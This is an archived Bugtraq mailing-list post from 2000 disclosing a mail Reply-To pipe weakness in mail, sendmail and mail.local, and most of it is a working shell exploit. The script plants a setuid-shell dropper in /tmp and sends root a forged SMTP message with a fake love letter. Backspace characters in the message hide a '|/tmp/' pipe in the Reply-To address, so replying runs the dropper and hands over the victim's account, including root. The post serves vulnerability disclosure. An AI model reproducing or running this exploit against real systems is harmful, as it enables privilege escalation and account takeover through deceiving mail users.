Home page logo
/

bugtraq logo Bugtraq mailing list archives

mail Reply-To field exploit
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Sun, 5 Nov 2000 21:56:17 GMT

hi all,

because there are few people here that didn't seem to understand how
serious is the mail.local/mail/sendmail weakness i reported to bugtraq
few days ago (lack of imagination ? )
here is an exploit, not technicaly impressive but just enough powerfull to
deceive many people around here and take over their account priviledge.
I persist to claim that no | char should be allowed in any smtp/lmtp/mime
fields
(even in contradiction with any rfc) because of the major security
vulnerability it introduce.
Note: It's NOT A BUG in mail, sendmail or mail.local but a weakness caused
by a bindly
rfc compliance.
I didn't try elm, mailx and others so feedback are welcomed

payback here is victim account take over by spawning a setuid shell
in /tmp. (even root)

Solution: take care about the reply-to recipient real anatomy. :)

Cheers,

Gregory Duchemin



I LOVE YOU letter for Unix
==========================


#!/bin/sh
#
# I-Love-U.sh

# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
#

# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
#
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r () hotmail com



# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
#


cd /tmp
cat ^H^H^H^H^Hsabelle () hotmail com << _End
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
_End


{
sleep 1
echo "HELO hotmail.com"
sleep 1
echo "MAIL FROM:<Isabelle () hotmail com>"
sleep 1
echo "RCPT TO:<root>"
sleep 1
echo "DATA"
sleep 1

# Reply-to will appear as Reply-To:<|sabelle () hotmail com>

echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle () hotmail com>"
sleep 1
echo
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
echo
echo "Isabelle."
echo "."
sleep 1
echo "QUIT"
sleep 2
}|telnet localhost 25

echo "Job is done...now check for newsh in /tmp"
echo
echo

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]